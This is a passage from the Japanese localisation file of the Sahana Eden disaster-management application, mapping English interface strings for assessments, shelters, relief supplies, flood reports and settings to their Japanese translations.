'Defaults': 'デフォルト値',
'Defecation area for animals': '動物排便用の地域',
'Defines the icon used for display of features on handheld GPS.': 'ハンドヘルドGPSに表示するアイコンを決定します。',
'Defines the icon used for display of features on interactive map & KML exports. A Marker assigned to an individual Location is set if there is a need to override the Marker assigned to the Feature Class. If neither are defined, then the Default Marker is used.': '対話型地図および KML の出力上で Feature の表示に使用するアイコンを定義します。Feature Class に割り当てられたマーカーを上書きする必要がある場合、個々の場所に割り当てられたマーカーが設定されます。どちらも定義されていない場合は、デフォルトのマーカーが使用されます。',
'Defines the icon used for display of features on interactive map & KML exports.': 'インタラクティブマップとKMLエクスポートで建物などの表示に使われるアイコン定義',
'Defines the marker used for display & the attributes visible in the popup.': 'ポップアップ時と通常時に表示されるマーカーを指定してください。',
'Degrees must be a number between -180 and 180': '度数は -180 から 180 の間にしてください。',
'Dehydration': '脱水症状',
'Delete Aid Request': '援助要請を削除',
'Delete Alternative Item': '代わりの物資を削除する',
'Delete Assessment Summary': 'アセスメントの要約を削除',
'Delete Assessment': 'アセスメントを削除',
'Delete Asset Assignments': '資産割り当ての削除',
'Delete Asset': '資産の削除',
'Delete Baseline Type': '基準値タイプを削除',
'Delete Baseline': '基準値を削除',
'Delete Brand': 'ブランドを削除してください',
'Delete Budget': '予算を削除',
'Delete Bundle': 'Bundleを削除',
'Delete Catalog Item': '救援物資カタログを削除',
'Delete Cluster Subsector': 'クラスタのサブクラスタを削除',
'Delete Cluster': 'クラスタを削除',
'Delete Commitment Item': 'コミットした物資の削除',
'Delete Commitment': 'コミットメントの削除',
'Delete Config': '設定を削除',
'Delete Contact Information': '連絡先情報の削除',
'Delete Credential': '証明書の削除',
'Delete Distribution Item': '配給物資を削除',
'Delete Distribution': '配給所を削除',
'Delete Document': '文書を削除',
'Delete Donor': '資金提供組織を削除',
'Delete Entry': 'エントリを削除',
'Delete Feature Layer': '機能レイヤを削除',
'Delete Group': 'グループを削除',
'Delete Hospital': '病院を削除',
'Delete Image': '画像を削除',
'Delete Impact Type': '影響範囲のタイプを削除',
'Delete Impact': '影響範囲の削除',
'Delete Incident Report': 'インシデントレポートを削除',
'Delete Incident': 'インシデントを削除',
'Delete Inventory Item': '備蓄物資を削除',
'Delete Inventory Store': '物資集積地点を削除',
'Delete Item Category': 'アイテムカテゴリを削除',
'Delete Item Pack': '救援物資パックの削除',
'Delete Item': '救援物資を削除',
'Delete Key': 'Keyを削除',
'Delete Kit': 'Kitを削除',
'Delete Layer': 'レイヤーを削除',
'Delete Level 1 Assessment': 'レベル1アセスメントの削除',
'Delete Level 2 Assessment': 'レベル2アセスメントの削除',
'Delete Location': 'ロケーションを削除',
'Delete Map Profile': '地図設定を削除',
'Delete Marker': 'マーカーを削除',
'Delete Membership': 'メンバシップを削除',
'Delete Message': 'メッセージを削除',
'Delete Metadata': 'メタデータを削除',
'Delete Need Type': '需要タイプを削除',
'Delete Need': '要求を削除',
'Delete Office': 'オフィスを削除',
'Delete Old': '古いものを削除',
'Delete Organization': '団体情報を削除',
'Delete Peer': 'データ同期先の削除',
'Delete Person': '人物情報を削除',
'Delete Photo': '写真を削除',
'Delete Project': 'プロジェクトを削除',
'Delete Projection': '地図投影法を削除',
'Delete Rapid Assessment': '被災地の現況アセスメントを削除',
'Delete Received Item': '受け取った物資の削除',
'Delete Received Shipment': '受け取った輸送の削除',
'Delete Record': 'レコードを削除',
'Delete Recovery Report': '遺体回収レポートを削除',
'Delete Report': 'レポートを削除',
'Delete Request Item': '物資の要請を削除',
'Delete Request': '支援要請を削除',
'Delete Resource': 'リソースを削除',
'Delete Section': 'Sectionを削除',
'Delete Sector': '活動分野を削除',
'Delete Sent Item': '送付物資を削除',
'Delete Sent Shipment': '輸送物資を削除',
'Delete Service Profile': 'サービスプロファイルを削除',
'Delete Setting': '設定を削除',
'Delete Skill Type': 'スキルタイプを削除',
'Delete Skill': 'スキルを削除',
'Delete Staff Type': 'スタッフタイプを削除',
'Delete Status': '状況を削除しました',
'Delete Subscription': '寄付申し込みを削除',
'Delete Survey Answer': '調査回答削除',
'Delete Survey Question': 'Survey Questionを削除',
'Delete Survey Section': '調査項目を削除',
'Delete Survey Series': '一連の調査を削除',
'Delete Survey Template': '調査用テンプレートを削除',
'Delete Unit': '単位を削除',
'Delete User': 'ユーザを削除',
'Delete Volunteer': 'ボランティアを削除',
'Delete Warehouse Item': '倉庫物資の削除',
'Delete Warehouse': '倉庫を削除',
'Delete from Server?': 'サーバから削除しますか?',
'Delete': '削除',
'Delivered': '配信済み',
'Delphi Decision Maker': 'Delphi意思決定',
'Demographic': '人口情報',
'Demonstrations': 'デモ発生',
'Dental Examination': '歯科検査',
'Dental Profile': '歯の欠損/治療跡',
'Department/Unit Name': '所属部課名',
'Deployment': '展開',
'Describe the condition of the roads to your hospital.': '道路状況|病院までの道路状況を記載してください',
"Describe the procedure which this record relates to (e.g. 'medical examination')": 'このレコードに関連する手続きを説明してください。(例えば "検診" です。)',
'Description of Bin Type': 'Binタイプを記載してください',
'Description of Contacts': '連絡先の説明',
'Description of defecation area': '排泄用地についての補足説明',
'Description of drinking water source': '飲料水に関する補足説明',
'Description of sanitary water source': '生活用水に関する説明',
'Description of water source before the disaster': '災害発生前の水の確保方法について補足説明',
'Description': '説明',
'Descriptive Text (e.g., Prose, etc)': '説明文 (例: 文学、等)',
'Designated for': '指定済み',
'Desire to remain with family': '家族との残留を希望',
'Destination': '目的地',
'Detail': '詳細',
'Details': '詳細',
'Dialysis': '透析',
'Diaphragms, horizontal bracing': '仕切り板、水平部材',
'Diarrhea among children under 5': '5歳未満の幼児に下痢が蔓延している',
'Diarrhea': '下痢',
'Dignitary Visit': '要人の訪問',
'Dimensions of the storage bin. Input in the following format 1 x 2 x 3 for width x depth x height followed by choosing the unit from the drop down list.': '物資備蓄スペースの容積。ドロップダウンリストから単位を選び、以下の形式にしたがって入力してください。 1 x 2 x 3 , 横幅 x 奥行き x 縦幅。',
'Dimensions of the storage location. Input in the following format 1 x 2 x 3 for width x depth x height followed by choosing the unit from the drop down list.': '物資備蓄スペースの容積。ドロップダウンリストから単位を選び、以下の形式にしたがって入力してください。 1 x 2 x 3 , 横幅 x 奥行き x 縦幅。',
'Direction': '方向',
'Disable': '無効',
'Disabled participating in coping activities': '障害者が災害対応に従事',
'Disabled': '無効',
'Disabled?': '無効になっているか?',
'Disaster Victim Identification': '被災者の同定',
'Disaster Victim Registry': '被災者登録',
'Disaster clean-up/repairs': '災害の清掃活動や修復',
'Discharge (cusecs)': '流水量 (cusecs)',
'Discharges/24hrs': '退院者数/24h',
'Discussion Forum on item': 'フォーラム(物資について)',
'Discussion Forum': 'フォーラム',
'Disease vectors': '病原媒介者',
'Dispatch Items': 'アイテムの発送',
'Dispatch': '発送',
'Dispensary': '診療所',
'Displaced Populations': '避難者数',
'Displaced': '避難中',
'Display Polygons?': '多角形を表示しますか?',
'Display Routes?': 'ルートを表示しますか?',
'Display Tracks?': 'Tracksを表示しますか?',
'Display Waypoints?': 'ウェイポイントを表示しますか?',
'Dispose Expired/Unusable Items': '期限切れ / 使用できない物資の処分',
'Dispose': '処分',
'Distance between defecation area and water source': '水資源採取場所と排泄場所の間の距離',
'Distance between latrines and temporary shelter in meters': 'トイレと避難所の距離(m)',
'Distance between shelter and latrines': '簡易避難所と排泄場所との間の距離(メートル)',
'Distance(Kms)': '距離(Kms)',
'Distribution Details': '配給所の詳細',
'Distribution Item Details': '配給物資の詳細',
'Distribution Item added': '配給物資を追加しました',
'Distribution Item deleted': '配給物資を削除しました',
'Distribution Item updated': '配給物資を更新しました',
'Distribution Item': '配給物資',
'Distribution Items': '配給物資',
'Distribution added': '配給所を追加しました',
'Distribution deleted': '配給所を削除しました',
'Distribution groups': '配信グループ',
'Distribution updated': '配給所を更新しました',
'Distribution': '配給所',
'Distributions': '配給所',
'District': '地区(行政地区)',
'Do adolescent and youth in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)': 'あなたの地域の青年は、災害に対応するための支援活動に参加しますか?(例: 打ち合わせ、宗教活動、清掃活動ボランティアなど)',
'Do households each have at least 2 containers (10-20 litres each) to hold water?': '1つの世帯ごとに、少なくとも2つ以上の水貯蔵容器(10-20リットル/容器)があるかどうかを記載してください',
'Do households have appropriate equipment and materials to cook their food (stove, pots, dished plates, and a mug/drinking vessel, etc)?': '調理や食事に必要となる道具や器材(コンロ、ポット、皿やプレート、マグカップ、飲料容器など)が世帯に存在するかを記載します',
'Do households have bedding materials available (tarps, plastic mats, blankets)?': 'ベッド、あるいはベッド用部材(例:タープ、プラスチックマット、毛布)が世帯に存在するかを記載します',
'Do households have household water storage containers?': '水貯蔵容器が世帯に存在するかを記載します',
'Do minority members in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)': '地域にいるマイノリティ(社会的少数者)の人が、自助的な災害対処につながる活動に参加しているか記載してください。(例 打ち合わせ、宗教活動、地域の清掃ボランティアなど)',
'Do older people in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)': '災害復旧活動に従事している高齢者が、共同体の中にいるかどうかを記載してください(例: 打ち合わせ、宗教活動、清掃活動ボランティアなど)',
'Do people have at least 2 full sets of clothing (shirts, pants/sarong, underwear)?': '個人に対して、少なくとも2セット以上の衣服(シャツ、ズボン/腰巻、下着など)があるかどうか記載してください',
'Do people have reliable access to sufficient sanitation/hygiene items (bathing soap, laundry soap, shampoo, toothpaste and toothbrush)?': '十分な量のサニタリ / 衛生用品が、安定して供給されているかどうかを記載します(石鹸、シャンプー、歯ブラシ、洗濯用洗剤など)',
'Do people with disabilities in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)': 'あなたの地域で障害者と一緒にいる方は、災害に対処るための彼らの支援活動に参加しますか?(例: 打ち合わせ、宗教活動、清掃活動ボランティアなど)',
'Do women and girls have easy access to sanitary materials?': '女性用生理用品の入手が容易かどうかを記載してください',
'Do women in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)': 'あなたの地域の女性は、災害対応のための支援活動に参加しますか?(例: 打ち合わせ、宗教活動、清掃活動ボランティアなど)',
'Do you have access to cash to restart your business?': 'ビジネス再開に必要な現金が入手可能かどうかを記載してください',
'Do you know of any incidents of violence?': '暴力事件が発生したかどうかを記載してください',
'Do you know of children living on their own (without adults)?': '成人がおらず、未成年のみで生活しているグループがあるかどうかを記載してください',
'Do you know of children separated from their parents or caregivers?': '親や養育者とはぐれた未成年がいるかどうかを記載してください',
'Do you know of children that have been orphaned by the disaster?': '災害によって孤児となった未成年がいるかどうかを記載してください',
'Do you know of children that have been sent to safe places?': '安全な場所に疎開した未成年がいるかどうかを記載してください',
'Do you know of children that have disappeared without explanation in the period since the disaster?': '災害発生後、行き先の説明ないまま連絡が取れなくなった未成年がいるかどうかを記載してください',
'Do you know of older people who are primary caregivers of children?': '未成年に対する介護経験がある高齢者がいるかどうかを記載してください',
'Do you know of parents/caregivers missing children?': '子供と連絡が取れなくなった親や養育者がいるかどうかを記載してください',
'Do you really want to delete these records?': '本当にこれらのデータを削除しますか?',
'Do you want to cancel this received shipment? The items will be removed from the Inventory. This action CANNOT be undone!': 'この輸送の受領をキャンセルしますか?キャンセルするとこの物資は備蓄から削除されます。この操作は *取り消せません!*',
'Do you want to cancel this sent shipment? The items will be returned to the Inventory. This action CANNOT be undone!': '出荷された物資をキャンセルしますか?この物資は、在庫に返されます。このアクションは、元に戻せません。',
'Do you want to over-write the file metadata with new default values?': 'ファイルのメタデータを、新しいデフォルト値で上書きしますか?',
'Do you want to receive this shipment?': 'この輸送物資を受け取られますか?',
'Do you want to send these Committed items?': 'これらコミットされた物資を送付してよいですか?',
'Do you want to send this shipment?': 'この発送情報を送信しますか?',
'Document Details': '文書の詳細',
'Document Scan': '文書のスキャン',
'Document added': '文書を追加しました',
'Document deleted': '文書を削除しました',
'Document updated': '文書を更新しました',
'Document': '文書',
'Documents and Photos': '文書と写真',
'Documents': '文書',
'Does this facility provide a cholera treatment center?': 'コレラ治療センターの機能を提供可能かどうか',
'Doing nothing (no structured activity)': '活動なし(組織立った行動なし)',
'Dollars': 'ドル',
'Domain': 'ドメイン',
'Domestic chores': '家事手伝い',
'Donation Certificate': '寄付証明書',
'Donation Phone #': '寄付受付電話番号',
'Donor Details': '資金提供組織の詳細',
'Donor added': '資金提供組織を追加しました',
'Donor deleted': '資金提供組織を削除しました',
'Donor updated': '資金提供組織を更新しました',
'Donor': '資金提供組織',
'Donors Report': '資金提供レポート',
'Donors': '資金提供組織',
'Door frame': 'ドア枠',
'Download PDF': 'PDFをダウンロード',
'Draft Features': '草案(ドラフト)',
'Draft': 'ドラフト',
'Drainage': '排水',
'Drawing up a Budget for Staff & Equipment across various Locations.': 'ロケーションに対する、スタッフと備品の予算を作成します。',
'Drill Down by Group': 'グループで絞り込み',
'Drill Down by Incident': 'インシデントで絞り込み',
'Drill Down by Shelter': '避難所で絞り込み',
'Driving License': '運転免許',
'Drought': '干ばつ',
'Drugs': '医薬品',
'Dug Well': '丸井戸',
'Duplicate?': '重複?',
'Duration': '活動実施期間',
'Dust Storm': '粉塵嵐',
'Dwelling': '居住施設',
'Dwellings': '住居数',
'EMS Reason': '緊急医療受け入れ状態',
'EMS Status Reason': '救急医療状況の理由',
'EMS Status': 'EMSステータス',
'EMS Traffic Status': '救急医療の混雑状況',
'ER Status Reason': 'ER医療状況の理由',
'ER Status': 'ER ステータス',
'Early Recovery': '早期復旧',
'Earthquake': '地震',
'Easy access to sanitation items for women/girls': '女性用サニタリ用品の入手が容易である',
'Edit Activity': '支援活動を編集',
'Edit Address': '住所の編集',
'Edit Aid Request': '援助要請を編集',
'Edit Alternative Item': '代わりの物資を編集',
'Edit Application': 'アプリケーションの編集',
'Edit Assessment Summary': 'アセスメントの要約を編集',
'Edit Assessment': 'アセスメントを編集',
'Edit Asset Assignment': '資産割り当ての編集',
'Edit Asset': '資産を編集',
'Edit Baseline Type': '基準値のタイプを編集',
'Edit Baseline': 'Baselineの編集',
'Edit Brand': '銘柄の編集',
'Edit Budget': '予算の編集',
'Edit Bundle': 'Bundleの編集',
'Edit Catalog Item': '救援物資カタログの編集',
'Edit Category<>Sub-Category<>Catalog Relation': 'Category<>Sub-Category<>Catalog 関係の編集',
'Edit Cluster Subsector': 'クラスタのサブセクターの編集',
'Edit Cluster': 'クラスタを編集',
'Edit Commitment Item': 'コミットされた物資の検索',
'Edit Commitment': 'コミットを編集',
'Edit Config': '設定の編集',
'Edit Contact Information': '連絡先情報の編集',
'Edit Contact': '連絡先の編集',
'Edit Contents': '内容の編集',
'Edit Credential': '証明書の編集',
'Edit Dead Body Details': '遺体の詳細を編集',
'Edit Defaults': 'デフォルト値の編集',
'Edit Description': '説明の編集',
'Edit Details': '詳細の編集',
'Edit Disaster Victims': '被災者情報の編集',
'Edit Distribution Item': '配給物資の編集',
'Edit Distribution': '配給所の編集',
'Edit Document': '文書を編集',
'Edit Donor': '資金提供組織の編集',
'Edit Email Settings': '電子メール設定の編集',
'Edit Feature Layer': 'Feature Layerの編集',
'Edit Flood Report': '洪水レポートの編集',
'Edit Gateway Settings': 'ゲートウェイ設定の編集',
'Edit Group': 'グループの編集',
'Edit Hospital': '病院の編集',
'Edit Identification Report': 'IDレポートの編集',
'Edit Identity': 'IDの編集',
'Edit Image Details': '画像の詳細の編集',
'Edit Image': '画像の編集',
'Edit Impact Type': '災害影響のタイプを編集',
'Edit Impact': '被災影響の編集',
'Edit Incident Report': 'インシデントレポートの編集',
'Edit Incident': 'インシデントを編集',
'Edit Inventory Item': '備蓄物資の編集',
'Edit Inventory Store': '物資集積地点の編集',
'Edit Item Catalog Categories': '救援物資カタログのカテゴリを編集',
'Edit Item Catalog': '救援物資カタログの編集',
'Edit Item Category': '救援物資カテゴリの編集',
'Edit Item Pack': '物資パックを編集',
'Edit Item Sub-Categories': '救援物資サブカテゴリの編集',
'Edit Item': '物資の編集',
'Edit Key': 'Keyの編集',
'Edit Kit': 'Kitの編集',
'Edit Layer': 'レイヤの編集',
'Edit Level 1 Assessment': 'レベル1アセスメントを編集する',
'Edit Level 2 Assessment': 'レベル2アセスメントを編集',
'Edit Location': 'ロケーションの編集',
'Edit Log Entry': 'ログエントリの編集',
'Edit Map Profile': '地図設定を編集する',
'Edit Map Services': '地図サービスの編集',
'Edit Marker': 'マーカーの編集',
'Edit Membership': 'メンバシップの編集',
'Edit Message': 'メッセージの編集',
'Edit Messaging Settings': 'メッセージ設定の編集',
'Edit Metadata': 'メタデータの編集',
'Edit Modem Settings': 'モデム設定の編集',
'Edit Need Type': '需要タイプの編集',
'Edit Need': 'ニーズを編集',
'Edit Note': '追加情報を編集',
'Edit Office': 'オフィスの編集',
'Edit Options': 'オプション編集',
'Edit Organization': '団体の編集',
'Edit Parameters': 'パラメータの編集',
'Edit Peer Details': 'データ同期先の詳細を編集',
'Edit Peer': 'データ同期先の編集',
'Edit Person Details': '人物情報の詳細を編集',
'Edit Personal Effects Details': 'Personal Effectsの詳細の編集',
'Edit Photo': '写真の編集',
'Edit Pledge': '寄付の編集',
'Edit Position': '場所の編集',
'Edit Problem': '問題の編集',
'Edit Project': 'プロジェクトの編集',
'Edit Projection': '地図投影法の編集',
'Edit Rapid Assessment': '被災地の現況アセスメントの編集',
'Edit Received Item': '物資の受領を編集',
'Edit Received Shipment': '物資の輸送の受領報告を編集',
'Edit Record': 'レコードの編集',
'Edit Recovery Details': '遺体回収の詳細を編集',
'Edit Registration Details': '登録状況の詳細を編集',
'Edit Registration': '登録の編集',
'Edit Report': 'レポートの編集',
'Edit Request Item': '物資の要請を編集',
'Edit Request': '支援要請の編集',
'Edit Resource': 'リソースの編集',
'Edit Response': '返信を編集',
'Edit River': '河川の編集',
'Edit Role': '役割の編集',
'Edit Sector': '活動分野を編集',
'Edit Sent Item': '送付した物資の編集',
'Edit Setting': '設定の編集',
'Edit Settings': '設定の編集',
'Edit Shelter Service': '避難所提供サービスの編集',
'Edit Shelter Type': '避難所タイプの編集',
'Edit Shelter': '避難所の編集',
'Edit Shipment Transit Log': '輸送履歴の編集',
'Edit Shipment to Send': '送付する輸送を編集',
'Edit Shipment/Way Bills': '輸送費/移動費の編集',
'Edit Shipment<>Item Relation': '輸送<>物資の関係を編集',
'Edit Site': 'Siteを編集',
'Edit Skill Type': 'スキルタイプの編集',
'Edit Skill': 'スキルの編集',
'Edit Solution': '解決案の編集',
'Edit Staff Type': 'スタッフタイプの編集',
'Edit Staff': 'スタッフの編集',
'Edit Storage Bin Type(s)': 'Storage Binタイプを編集',
'Edit Storage Bins': 'Storage Binの編集',
'Edit Storage Location': '備蓄地点の編集',
'Edit Subscription': '寄付申し込みの編集',
'Edit Survey Answer': '調査回答の編集',
'Edit Survey Question': '調査の質問項目を編集',
'Edit Survey Section': 'フィードバック内容を編集します',
'Edit Survey Series': '一連の調査の編集',
'Edit Survey Template': '調査テンプレートを編集',
'Edit Task': 'タスクの編集',
'Edit Team': 'チームの編集',
'Edit Theme': 'テーマの編集',
'Edit Themes': 'テーマの編集',
'Edit Ticket': 'チケットの編集',
'Edit Track': '追跡情報の編集',
'Edit Tropo Settings': 'Tropo 設定の編集',
'Edit Unit': '単位の編集',
'Edit User': 'ユーザの編集',
'Edit Volunteer Details': 'ボランティアの詳細を編集する',
'Edit Volunteer Registration': 'ボランティア登録の編集',
'Edit Warehouse Item': '倉庫物資を編集',
'Edit Warehouse': '倉庫を編集',
'Edit current record': '現在のレコードの編集',
'Edit message': 'メッセージの編集',
'Edit the Application': 'アプリケーションの編集',
'Edit': '編集',
'Editable?': '編集可能?',
'Education materials received': '教育資材を受領した',
'Education materials, source': '教育資材の送付元',
'Education': '教育',
'Effects Inventory': '備蓄物資への影響',
'Eggs': '卵',
'Either a shelter or a location must be specified': '避難所かロケーションのどちらかを特定する必要があります',
'Either file upload or document URL required.': 'ファイルのアップロードと文書のURLの両方が必要です。',
'Either file upload or image URL required.': 'アップロードするファイルか、URLを指定してください。',
'Elderly person headed households (>60 yrs)': '代表者が60歳以上の世帯数',
'Electrical': '電動の',
'Electrical, gas, sewerage, water, hazmats': '電気、ガス、下水道、水、有害物',
'Elevated': '高まる',
'Elevators': 'エレベーター',
'Email Address': 'メールアドレス',
'Email Settings': '電子メール設定',
'Email address verified, however registration is still pending approval - please wait until confirmation received.': '電子メールの認証は完了しましたが、登録はまだ完了していません。確認が完了するまで少々お待ちください。',
'Email settings updated': '電子メールの設定を更新しました',
'Email verification': '利用者登録の確認',
'Email': '電子メール',
'Embalming': '遺体防腐処理',
'Embassy': '大使館',
'Emergency Capacity Building project': 'ECB (緊急時の被災者収容建築プロジェクト)',
'Emergency Department': '救急部門',
'Emergency Shelter': '緊急避難所',
'Emergency Support Facility': '緊急支援施設',
'Emergency Support Service': '緊急支援サービス',
'Emergency Telecommunications': '緊急時電話連絡先',
'Enable/Disable Layers': 'レイヤの有効化/無効化',
'Enabled': '有効',
'End date should be after start date': '終了日付は開始日付より後にしてください',
'End date': '終了日',
'End of Period': '終了期間',
'English': 'English 英語',
'Enter Coordinates': '緯度経度を入力',
'Enter Coordinates:': '座標入力:',
'Enter a GPS Coord': 'GPS Coordを入力',
'Enter a GPS Coordinate': 'GPS座標を入力してください',
'Enter a date before': '以前の日時を入力',
'Enter a few characters of the name to select an existing Location or else simply type the name of the new Location.': '最初の数文字を入力して既存の項目から選ぶか、あるいは新しいロケーション名を入力して、ロケーションを特定してください。',
'Enter a name for the spreadsheet you are uploading (mandatory).': 'アップロードするスプレッドシートの名前を入力してください。(必須項目)',
'Enter a new support request.': '新規の支援要請を登録',
'Enter a summary of the request here.': '要求事項の概要を入力',
'Enter a unique label!': 'そのラベル名は使われています。一意のラベル名を入力してください。',
'Enter a valid date before': 'より前の正しい日付を入力してください',
'Enter a valid email': '正しいメールアドレスを入力してください',
'Enter a valid future date': '正しい未来の日付を入力してください',
'Enter some characters to bring up a list of possible matches': '文字を入力することで、候補の一覧が表示されます',
'Enter some characters to bring up a list of possible matches.': '検索文字列を入力してください',
'Enter tags separated by commas.': 'タグはカンマで区切って入力してください。',
'Enter the same password as above': '確認のため、パスワードを再入力',
'Enter your firstname': 'あなたの名前を入力',
'Entered': '入力された',
'Entering a phone number is optional, but doing so allows you to subscribe to receive SMS messages.': '電話番号の入力は任意です。入力すると、SMS メッセージの受け取り登録ができます。',
'Entering an Organization is optional, but doing so directs you to the appropriate approver & means you automatically get the appropriate permissions.': '選択リストに含まれる団体のメンバーであれば、所属する団体を選択してください。(団体の選択は必須ではありません)',
'Entry deleted': 'エントリを削除しました',
'Environment': '環境',
'Equipment': '備品',
'Error encountered while applying the theme.': 'テーマ適用時にエラーが発生しました。',
'Error in message': 'エラーメッセージ',
"Error logs for '%(app)s'": '"%(app)s" に関するエラーログ',
'Errors': 'エラー',
'Estimated # of households who are affected by the emergency': '非常事態の影響を受けた世帯の推定数',
'Estimated # of people who are affected by the emergency': '非常事態の影響を受けた住民の推定数',
'Estimated Overall Building Damage': '建物全体の被害見積り',
'Estimated total number of people in institutions': 'なんらかの施設に収容されている住民の推定数',
'Euros': 'ユーロ',
'Evacuating': '退避中',
'Evaluate the information in this message. (This value SHOULD NOT be used in public warning applications.)': 'このメッセージの情報を評価します。(この値は、公開される警告アプリケーションで使用してはなりません)',
'Event Time': 'イベント発生時刻',
'Event Type': 'イベントタイプ',
'Event type': 'イベントタイプ',
'Example': '例',
'Exceeded': '超過',
'Exclude contents': 'コンテンツを除く',
'Excreta disposal': 'し尿処理',
'Execute a pre-planned activity identified in <instruction>': '事前に準備していた計画 <instruction>を実行する',
'Existing Placard Type': '設置されたポスターのタイプ',
'Existing food stocks': '食糧備蓄あり',
'Existing food stocks, main dishes': '備蓄中の食料(主皿)',
'Existing food stocks, side dishes': '備蓄中の食料(副皿)',
'Exits': '出口',
'Expected In': '予定期間',
'Expected Out': '予期される出力',
'Experience': '熟練者',
'Expiry Date': '有効期限',
'Expiry Time': '有効期限',
'Expiry_Date': '有効期限',
'Explosive Hazard': '爆発災害',
'Export Data': 'データのエクスポート',
'Export Database as CSV': 'データベースをCSV形式でエクスポート',
'Export in GPX format': 'GPXフォーマットでエクスポート',
'Export in KML format': 'KMLフォーマットでエクスポート',
'Export in OSM format': 'OSMフォーマットでエクスポート',
'Export in PDF format': 'PDFフォーマットでエクスポート',
'Export in RSS format': 'RSSフォーマットでエクスポート',
'Export in XLS format': 'XLSフォーマットでエクスポート',
'Export': 'エクスポート',
'Exterior Only': '外装のみ',
'Exterior and Interior': '外装と内装',
'External Features': '外部機能',
'Eye Color': '目の色',
'Facial hair, color': 'ヒゲ, 色',
'Facial hair, type': 'ヒゲ, 形状',
'Facial hear, length': 'ヒゲ, 長さ',
'Facility Operations': '施設の運用',
'Facility Status': '施設の状態',
'Facility Type': '施設タイプ',
'Factors affecting school attendance': '生徒の就学に影響する要因',
'Failed to send mail to Approver - see if you can notify them manually!': '承認依頼メールを送信できませんでした。利用者登録は完了していません。サイト管理者へ連絡してください。',
'Failed!': '失敗しました!',
'Falling Object Hazard': '落下/墜落による災害',
'Families/HH': '家族/世帯',
'Family tarpaulins received': 'タープ(家族用簡易テント)を受領した',
'Family tarpaulins, source': 'タープ(家族用簡易テント)の送付元',
'Family': '家族',
'Family/friends': '家族/友人',
'Farmland/fishing material assistance, Rank': '農業 / 漁業用物資の補助、ランク',
'Fatalities': '死亡者',
'Fax': 'ファックス',
'Feature Layer Details': '機能レイヤの詳細',
'Feature Layer added': '機能レイヤを追加しました',
'Feature Layer deleted': '機能レイヤを削除しました',
'Feature Layer updated': '機能レイヤを更新しました',
'Feature Layers': '機能レイヤ',
'Feature Namespace': 'Feature 名前空間',
'Feature Request': '機能の要求',
'Feature Type': 'Feature タイプ',
'Feature': '機能',
'Features Include': '含まれる機能',
'Female headed households': '代表者が女性の世帯数',
'Female': '女性',
'Few': '少数',
'Field Hospital': '野外病院',
'File': 'ファイル',
'Fill in Latitude': '緯度を記入',
'Fill in Longitude': '経度を記入',
'Fill out Rapid Evaluation Forms': '迅速評価フォームに記入します',
'Fill out detailed Evaluation Forms': '詳細な評価フォームに入力する',
'Filter Field': 'フィールドをフィルタする',
'Filter Value': '値をフィルタ',
'Filter': 'フィルタ',
'Filtered search of aid pledges and requests': '援助申出と要請の検索されたもの',
'Find All Matches': '完全一致',
'Find Dead Body Report': '遺体レポートの発見',
'Find Hospital': '病院を探す',
'Find Person Record': '人物情報を検索',
'Find Recovery Report': '遺体発見レポート',
'Find Volunteers': 'ボランティアを探す',
'Find a Person Record': '人物情報を検索する',
'Find by Name': '名前で検索',
'Find': '検索',
'Finder': '発見者',
'Fingerprint': '指紋',
'Fingerprinting': '指紋',
'Fingerprints': '指紋',
'Finish': '完了',
'Finished Jobs': '完了したジョブ',
'Fire suppression and rescue': '消火・救出活動',
'Fire': '火災',
'First Name': '苗字',
'First name': '苗字',
'Fishing': '漁業',
'Flash Flood': '鉄砲水',
'Flash Freeze': '瞬間凍結',
'Fleet Management': '船舶の管理',
'Flexible Impact Assessments': '災害影響範囲アセスメント',
'Flood Alerts show water levels in various parts of the country': '洪水警報では、国内各所の水位情報を確認することができます。',
'Flood Alerts': '洪水警報',
'Flood Report Details': '洪水レポートの詳細',
'Flood Report added': '洪水レポートを追加しました',
'Flood Report deleted': '洪水レポートを削除しました',
'Flood Report updated': '洪水レポートを更新しました',
'Flood Report': '洪水レポート',
'Flood Reports': '洪水レポート',
'Flood': '洪水',
'Flow Status': '流れの状況',
'Focal Point': '代表者',
'Fog': '濃霧',
'Food Supply': '食料の供給',
'Food assistance available/expected': '食糧援助が利用可能 / 期待できる',
'Food assistance': '食糧援助',
'Food': '食料',
'Footer file %s missing!': 'フッターファイル%sが見つかりません。',
'Footer': 'フッタ',
'For Eden instances enter the application base URL, e.g. http://sync.sahanfoundation.org/eden, for other peers the URL of the synchronization interface.': 'Eden の場合はベースURL(例えば http://sync.sahanfoundation.org/eden)、他のシステムの場合は同期インターフェースのURL。',
'For POP-3 this is usually 110 (995 for SSL), for IMAP this is usually 143 (993 for IMAP).': 'POP-3では通常110 (SSLでは995)で、IMAPでは通常143 (IMAPSでは993)。',
'For Warehouse': '倉庫向け',
'For a country this would be the ISO2 code, for a Town, it would be the Airport Locode.': '国の場合は ISO2 コード、町の場合は 空港コード(Airport Locode)',
'For each sync partner, there is a default sync job that runs after a specified interval of time. You can also set up more sync jobs which could be customized on your needs. Click the link on the right to get started.': 'それぞれの同期パートナーについて、指定した間隔で実行する同期ジョブがデフォルトで存在します。必要に応じて、さらなる同期ジョブを設定し、カスタマイズすることができます。開始するには、リンクをクリックしてください。',
'For enhanced security, you are recommended to enter a username and password, and notify administrators of other machines in your organization to add this username and password against your UUID in Synchronization -> Sync Partners': 'セキュリティ向上のため、ユーザー名とパスワードを入力し、団体の他端末の管理者にユーザー名とパスワードを通知して「データ同期」 -> 「データ同期パートナー」であなたのUUIDに追加してもらうことを推奨します。',
'For live help from the Sahana community on using this application, go to': 'Sahanaの使い方について Sahanaコミュニティからライブヘルプを希望する際は、以下に進んでください。',
'For messages that support alert network internal functions': '警戒(alert)ネットワークの内部機能をサポートするメッセージの場合',
'For more details on the Sahana Eden system, see the': 'Sahana Edenに関する詳細は、以下をごらんください。',
'For more information, see ': '詳細は、以下を参照してください。',
'For other types, the next screen will allow you to enter the relevant details...': 'その他の種類については、次の画面で関連する詳細情報を入力できます…',
'For': ' ',
'For:': '対象:',
'Forest Fire': '森林火災',
'Formal camp': '指定避難所',
'Format': 'フォーマット',
'Forms': 'フォーム',
'Found': '発見された',
'Foundations': '構造基礎',
